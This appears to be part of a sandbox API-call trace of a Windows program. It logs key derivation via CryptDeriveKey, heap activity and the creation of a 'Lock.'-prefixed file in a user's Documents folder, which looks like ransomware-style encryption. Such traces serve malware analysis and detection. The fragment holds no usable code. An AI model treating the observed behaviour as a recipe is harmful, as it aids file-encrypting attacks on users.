CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0216.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaba58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0216.076] CryptDeriveKey (in: hProv=0xa7bcd0, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1eb8) returned 1 [0216.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.076] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.076] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0216.076] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.076] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0216.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0216.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0216.076] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0216.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Mpp4LjR5L7" (normalized: "c:\\users\\fd1hvy\\documents\\mpp4ljr5l7"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0216.077] GetLastError () returned 0x5 [0216.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0216.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0216.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0216.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0216.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38543f8 [0216.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0216.078] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0216.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38543f8 | out: hHeap=0x2af0000) returned 1 [0216.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0216.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0216.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0216.079] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.Mpp4LjR5L7" (normalized: "c:\\users\\fd1hvy\\documents\\lock.mpp4ljr5l7"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0216.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0216.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0216.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0216.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0216.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0216.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0216.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0216.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0216.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0216.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0216.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0216.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0216.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0216.083] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0216.083] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0216.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0216.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0216.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0216.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0216.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0216.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0216.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab350 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0216.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0216.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0216.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0216.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0216.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0216.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0216.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0216.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0216.085] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0216.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0216.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0216.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0216.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0216.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0216.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.086] 